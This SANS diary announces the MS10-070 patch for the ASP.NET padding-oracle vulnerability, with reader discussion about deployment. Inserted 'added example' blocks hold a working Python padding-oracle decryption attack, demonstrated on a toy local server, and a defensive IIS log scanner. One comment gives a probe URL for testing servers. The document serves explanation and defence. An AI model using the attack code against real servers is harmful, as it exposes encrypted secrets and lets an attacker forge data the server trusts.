MS10-070 OOB Patch for ASP.NET vulnerability

Published: 2010-09-28,
Last Updated: 2010-09-30 00:20:37 UTC
by Daniel Wesemann (Version: 5)

27 comment(s)

Microsoft Bulletin MS10-070 has been released. An update is now available that addresses the ASP.NET "information disclosure" vulnerability (CVE-2010-3332), the padding oracle attack on ASP.NET's encrypted data that we reported on earlier.

The core pieces in the advisory are probably in the sections that read

"In Microsoft .NET Framework 3.5 Service Pack 1 and above, this vulnerability can be used by an attacker to retrieve the contents of any file within the ASP.NET application, including web.config"   and  "This vulnerability can also be used for data tampering, which, if successfully exploited, could be used to decrypt and tamper with the data encrypted by the server." 

Translated, this means that the vulnerability undermines basic web application security: an attacker can read any file inside the application, web.config (with whatever connection strings it holds) included, and can forge data that the server trusts because it encrypted that data itself. I suspect that online shops and such might rate the risk that "an attacker can read any file" on their web application server a bit higher than just "important".

According to the bulletin, MSFT are aware of "active attacks".

In combination, this sure sounds like PATCH NOW! to me.

 

Update 1800UTC: If you're wondering what a "Padding Oracle" is, the original attack is described very well in this research paper. In short: when a server decrypts ciphertext supplied by the client and reveals, through a different error message or response, whether the decrypted padding was valid, an attacker can use those yes/no answers to decrypt the ciphertext byte by byte, and then to forge ciphertext of their choosing, without ever learning the key.

Update 1830UTC: Changing InfoCon to YELLOW, to raise awareness for this problem and patch. We'll go back to GREEN in 24hrs unless significant new information develops.

Update 00:13 UTC: Changing InfoCon back to Green. Most people should be well and truly aware of the issue. We may raise it again if we receive reports of widespread use or other changes.  
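What a padding oracle actually lets an attacker do, as an added example rather than code from this diary or from the POET authors: the script below implements the generic CBC/PKCS#7 padding-oracle decryption described in the paper against a local, deliberately vulnerable server. The block cipher is a constructed toy (a four-round Feistel network keyed with SHA-256) so that the script runs with the Python standard library alone; the attack code does not depend on which cipher sits underneath, only on the server answering "valid padding" or "invalid padding" for ciphertext the client chooses. The server class, the secret string and the query counter are assumptions made for the demonstration.

```python
# Added example (not code from the diary or the POET authors): generic CBC/PKCS#7
# padding-oracle decryption against a constructed toy cipher (stdlib only).
import hashlib
import os

BLOCK, HALF = 16, 8   # 16-byte blocks, like the Rijndael/AES that ASP.NET uses

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, rnd, half):   # toy round function: keyed hash, truncated to a half block
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:HALF]

def block_encrypt(key, block):
    left, right = block[:HALF], block[HALF:]
    for rnd in range(4):
        left, right = right, xor(left, _f(key, rnd, right))
    return left + right

def block_decrypt(key, block):
    left, right = block[:HALF], block[HALF:]
    for rnd in reversed(range(4)):
        left, right = xor(right, _f(key, rnd, left)), left
    return left + right

def pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("Padding is invalid and cannot be removed.")
    return data[:-n]

def cbc_encrypt(key, iv, plaintext):
    out, prev = b"", iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, xor(plaintext[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, ciphertext):
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        cur = ciphertext[i:i + BLOCK]
        out += xor(block_decrypt(key, cur), prev)
        prev = cur
    return out

class VulnerableServer:
    """Unpatched endpoint: no MAC on the ciphertext, distinct error on bad padding."""
    def __init__(self):
        self.key, self.queries = os.urandom(BLOCK), 0

    def encrypt(self, plaintext):
        iv = os.urandom(BLOCK)
        return iv + cbc_encrypt(self.key, iv, pad(plaintext))

    def padding_oracle(self, data):   # True/False is all the attacker ever sees
        self.queries += 1
        try:
            unpad(cbc_decrypt(self.key, data[:BLOCK], data[BLOCK:]))
            return True
        except ValueError:
            return False

def recover_block(oracle, prev, target):
    """Recover one plaintext block without the key: learn D_key(target) one byte
    at a time from the right by forging the block that precedes it."""
    inter = bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        padval = BLOCK - pos
        for guess in range(256):
            forged = bytearray(BLOCK)
            forged[pos] = guess
            for j in range(pos + 1, BLOCK):
                forged[j] = inter[j] ^ padval
            if not oracle(bytes(forged) + target):
                continue
            if pos == BLOCK - 1:          # rule out a false hit such as 02 02
                forged[pos - 1] ^= 0xFF
                if not oracle(bytes(forged) + target):
                    continue
            inter[pos] = guess ^ padval
            break
    return xor(inter, prev)

def padding_oracle_decrypt(oracle, data):
    blocks = [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]
    return unpad(b"".join(recover_block(oracle, blocks[i - 1], blocks[i])
                          for i in range(1, len(blocks))))

def demo(secret=b"<connectionStrings> lifted from web.config"):
    """Encrypt under a key the attacker never sees, then recover it via the oracle."""
    server = VulnerableServer()
    plain = padding_oracle_decrypt(server.padding_oracle, server.encrypt(secret))
    return plain, server.queries
```

Calling `demo()` returns the secret together with the number of oracle queries it took: at most 256 guesses per byte plus a couple of confirmation queries, and the key never leaves the server. That is also why a fix cannot be cosmetic: the server has to reject tampered ciphertext before it decrypts anything (a MAC over the ciphertext) and has to answer every failure in the same way, so that the yes/no channel the attack depends on does not exist.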


Comments

yeah, like Microsoft would release an "important" patch out of band...
posted by Ken, Tue Sep 28 2010, 17:25
My favorite part of the bulletin. "Why are the updates only available from the Microsoft Download Center? Due to the active attacks currently exploiting this vulnerability and the severity of potential loss of data, we are releasing these updates to the Microsoft Download Center so that customers can begin updating their systems as soon as possible. These updates will also be provided through our other standard distribution methods once testing has been completed to ensure distribution will be successful through these channels." In a nutshell, there is no support yet for using WSUS, WU, MU, SMS ITMU, or anything else to deploy these patches. It's not a big deal for workstations, since you shouldn't be running IIS on workstations and should be shields up 24x7 even on your internal LAN on your workstations. And for servers, you can always get something pushed out to the boxes you know are running ASP.NET.
posted by Anonymous, Tue Sep 28 2010, 17:35
so, is this officially "PATCH NOW" or not??
posted by dt, Tue Sep 28 2010, 17:47
@dt, yes it is. Your mileage might vary though - the patch is only available through Download Center for now, and not yet via the automated channels. But if you have a valuable internet facing server that is affected by the vulnerability, yes, *test* and then patch asap.
posted by Daniel@isc, Tue Sep 28 2010, 17:53
27 different downloads, targeting .Net 1.1 through 4.0 on x86, x64, and IA64. Download Center ridiculousness. And you can’t do a rolling upgrade on a web farm! The patch changes the length of encrypted strings, especially in WebResource.axd files, so unpatched machines can’t concurrently run on the same farm as patched machines.
posted by Joey, Tue Sep 28 2010, 18:02
http://isc.sans.edu/images/status.gif is still green...
posted by Ken, Tue Sep 28 2010, 19:17
@Ken, if you move away from the PC fast enough, the doppler effect will make it look like yellow. OKOK, you're right, we're working on it :)
posted by Daniel@isc, Tue Sep 28 2010, 19:24
@Joey
Where did you get your information about needing to push out the patch all at once or having your farm break? Anyone else know if this is true? Trying to decide if I should implement this patch or wait for reports of broken farms.
posted by arom, Tue Sep 28 2010, 19:34
Is this still considered a patch now if the two workarounds are in place?
posted by dave@work, Tue Sep 28 2010, 19:46
@arom, see ScottGu's blog for the webfarm info -- http://weblogs.asp.net/scottgu/archive/2010/09/28/asp-net-security-update-now-available.aspx
posted by Paul, Tue Sep 28 2010, 20:27
@Paul
Thank you for the link.
posted by arom, Tue Sep 28 2010, 20:34
@dave@work: probably not, or not completely (also see ScottGu's blog). One of the authors of the attack, Thai Duong, wrote (9:21 PM Sep 25th at http://twitter.com/thaidn/):
"Another video may prove it all, but I'm tired. So believe it or not, Microsoft workarounds can't prevent the attack. Ask them for the patch!"

In http://netifera.com/research/poet//PaddingOraclesEverywhereEkoparty2010.pdf Thai Duong and Juliano Rizzo wrote:
"POET -> remote code execution -> Cesar’s Token Kidnapping -> ROOT privilege on Windows"

The POET version that supposedly does this, has not yet been released, but if it is true then Microsoft flagging this vuln as "Important" seems not entirely appropriate to me.

Cesar Cerrudo's Token Kidnapping Revenge (privilege escalations and some fixes) are described in this document: http://www.argeniss.com/research/TokenKidnappingRevengePaper.pdf

Hopefully MS10-070 properly fixes this ASP.NET vulnerability...
posted by Bitwiper, Tue Sep 28 2010, 20:47
Bit confused around Server 2008 w/ .net 1.1 sp1.

According to microsoft you need to apply kb2416447

And it says that this is supported on the download page:

http://www.microsoft.com/downloads/en/details.aspx?familyid=a7990e61-21fd-4942-9dfe-af7961cb0282&displaylang=en

But it won't run on 2008, and the kb page itself (http://support.microsoft.com/?kbid=2416447) has no mention of 2008 support!

Also, the filename says x86; no clarity if there is a separate x64 version or not.
posted by zonky, Tue Sep 28 2010, 22:37
Microsoft should sue Juliano Rizzo and Ekoparty.
posted by n3td3v Security, Tue Sep 28 2010, 23:00
@zonky That should be the right download, so not sure why it won't run for you. There won't be a separate x64 selection for you since .Net 1.1 is 32 bit only and runs on WOW on x64 and IA64. MS probably screwed up the installer package - I'd contact support.
posted by Joey, Tue Sep 28 2010, 23:38
Question: it appears some of our Development systems have more than one version of the framework installed. Does each respective patch need to be installed?
posted by davef, Wed Sep 29 2010, 12:42
@Davef. Dave. I haven't got a system handy to confirm, but considering the files are different for each flavour of .net I would have to say "yes you do".
posted by Mark H (HOD), Wed Sep 29 2010, 13:13
I have published a writeup from an security operations guy perspective on http://cupfighter.net
posted by Seccubus, Thu Sep 30 2010, 06:56
If you have any data in a web shop inside the webroot that is not safe for customers to see, you had a problem before this bug was discovered.
If you use database passwords, then you also have a problem already that needs to be fixed. Windows Integrated authentication has been Microsoft's recommendation for 10 years by now (since SQL Server 2000).

I would say that this is a patch now only for bad websites. Well designed websites do not have any secret information inside the webroot, do not rely on client side data being untampered, and information disclosure is only of publicly available information anyway.

Viewstate is IMHO not any better than a form or cookie where the client can change data at his will. If the stake is high enough, the encryption can always be broken.
posted by PHP, Thu Sep 30 2010, 07:00
@Seccubus Thanks for that great summary of the webcast! Really helpful!
posted by pat, Thu Sep 30 2010, 13:24
Weird thing about the patch downloads. When you click on the download for .NET 2.0 SP2, the page that appears is a download page for 2.0 SP2 AND 3.5 SP1. (but the files being installed are shown as version 2.0.xxxxxx).

But if you click on the download for .NET 3.5 SP1, a separate download appears, targeted at only 3.5 SP1.

That's what I hate about manual downloads, we have to make assumptions about the patch logic. I have a server that has both 2.0 SP2 and 3.5 SP1 installed. My assumption is I install the first patch, then the second...
posted by pat, Thu Sep 30 2010, 14:17
I'm seeing normal updates for .net now at Microsoft Update.
posted by James, Thu Sep 30 2010, 18:56
According to http://www.troyhunt.com/2010/09/do-you-trust-your-hosting-provider-and.html (thanks Troy!), this is how to check whether your ISP has patched your webshop server: enter the following URL in your favorite web browser (adjust the hostname, the rest is fine):

http://www.example.com/WebResource.axd?d=zt87v2JeCPKYzqUfGEffpA2

Before patching, if publicly disclosing errors was _not_ disabled (which seems typical), you'll see:
____"Error: Padding is invalid and cannot be removed"____
accompanied by a lot of error-message-chatter mentioning "rijndael", "encrypt", "decrypt" etc. In that case, _after_ patching, you'll see:
____"Error: This is an invalid webresource request"____
and nothing that refers to crypto.

Obviously you'll not be the only one firing such URLs at your webshop. Anxious customers might, and perhaps a couple of scriptkiddies (so expect some extra log lines)...

BTW an ASP.NET server (W2K3) I patched today (.NET 1.1, 2.0 and 3.5) behaved exactly as described above, without any reboots after installing the applicable patches.

If you still think your ASP.NET site (in particular DotNetNuke-based) doesn't need patching, check this out:
Title: POET vs ASP.NET: don't waste time implementing useless workarounds - you should patch ;-)
Movie: http://www.youtube.com/watch?v=mP6mKLh1FBw

Although the POET version that attacks ASP.NET has (AFAIK) not yet been publicly released, others are building similar exploits, some of which _are_ publicly released. For example, see http://www.immunityinc.com/ceu-index.shtml (source: http://twitter.com/nicowaisman) and http://www.gdssecurity.com/l/b/2010/09/28/new-version-of-padbuster-available-for-download/

Personally I wouldn't have changed InfoCon back to green. This might get messy soon...
posted by Bitwiper, Thu Sep 30 2010, 22:23
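Two checks from the operations side, as an added example (not code from the diary, from Troy Hunt's post or from Microsoft): a classifier for the body that the WebResource.axd probe URL above returns, and a scan over IIS W3C logs that flags clients generating many HTTP 500s against the WebResource.axd and ScriptResource.axd handlers, which is what a padding-oracle attack looks like in the logs (hundreds of failed decryptions per block, against one request for a curious customer). The log lines and the reduced field set are constructed for the example, and the threshold is an assumption, not Microsoft guidance.

```python
# Added example (not from the diary, Troy Hunt's post or Microsoft): classify the
# probe response and scan IIS W3C logs for padding-oracle probing.
import re
from collections import Counter

UNPATCHED = "Padding is invalid and cannot be removed"    # crypto error reaches the client
PATCHED = "This is an invalid webresource request"         # uniform error after MS10-070

def classify_probe_response(body):
    """Classify the page returned for /WebResource.axd?d=<garbage>."""
    if UNPATCHED in body:
        return "unpatched"
    if PATCHED in body:
        return "patched"
    return "unknown"          # custom error page, redirect, or unrelated content

def parse_w3c(lines):
    """Parse IIS W3C extended log lines using whatever #Fields: header is present."""
    fields, rows = None, []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            rows.append(dict(zip(fields, line.split())))
    return rows

AXD = re.compile(r"/(web|script)resource\.axd$", re.IGNORECASE)

def find_oracle_probing(lines, threshold=50):
    """Return {client_ip: count} for clients whose requests to the .axd handlers
    ended in HTTP 500 at least `threshold` times (threshold is an assumption)."""
    counts = Counter()
    for row in parse_w3c(lines):
        if AXD.search(row.get("cs-uri-stem", "")) and row.get("sc-status") == "500":
            counts[row["c-ip"]] += 1
    return {ip: n for ip, n in counts.items() if n >= threshold}

# Constructed sample log: one customer running the manual check, one normal
# script request, and one client hammering the handler with forged tokens.
SAMPLE_LOG = [
    "#Software: Microsoft Internet Information Services 7.0",
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    "2010-09-29 08:00:01 198.51.100.10 GET /default.aspx - 200",
    "2010-09-29 08:00:02 198.51.100.10 GET /WebResource.axd d=zt87v2JeCPKYzqUfGEffpA2 500",
    "2010-09-29 08:00:03 198.51.100.11 GET /ScriptResource.axd d=validToken 200",
] + [
    f"2010-09-29 08:01:{s % 60:02d} 203.0.113.7 GET /WebResource.axd d={'A' * 20}{s:05d} 500"
    for s in range(300)
]

if __name__ == "__main__":
    print(classify_probe_response("Error: " + UNPATCHED + ". System.Security.Cryptography..."))
    print(find_oracle_probing(SAMPLE_LOG))
```

The scan counts 500s because that is what the unpatched handler returns for a bad token; if a custom error page is configured, failed requests may leave as redirects or 200s instead, in which case count requests to the handler per client rather than the status. Either way the volume is the signal: one probe per curious customer, hundreds per block for an attacker.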
Scott Gu's page referenced above mentions selecting the patches based on the "versions" of .NET you are running, so, yes, you do need to install multiple patches on one server if you're running multiple .NET framework versions. He indicates this is even true for 3.5 and 3.5sp1, that you need to install patches for both apparently if you're running 3.5sp1.

In that case he says order is not relevant; I imagine that applies to all issues of patching order for disparate .NET versions, but it's not perfectly clear.

posted by MattH, Fri Oct 01 2010, 03:24
Anyone know why they'd release the .NET patches to workstations? WSUS is telling me that every workstation qualifies for one or more of these patches, even though none of them run IIS (except a few in our software development dept). Any ideas?
posted by GDub, Fri Oct 01 2010, 18:18
@GDub the patch is a patch for a .net flaw, not actually specifically for ASP.Net, although that is the only place this vulnerability actually manifests itself. Any patched .net install that has IIS added (and yes, you can add IIS to a workstation) will expose this vulnerability. Hence MS took the (IMHO correct) decision that all .net installs with the vulnerability should be patched.
posted by Seccubus, Thu Oct 07 2010, 08:36
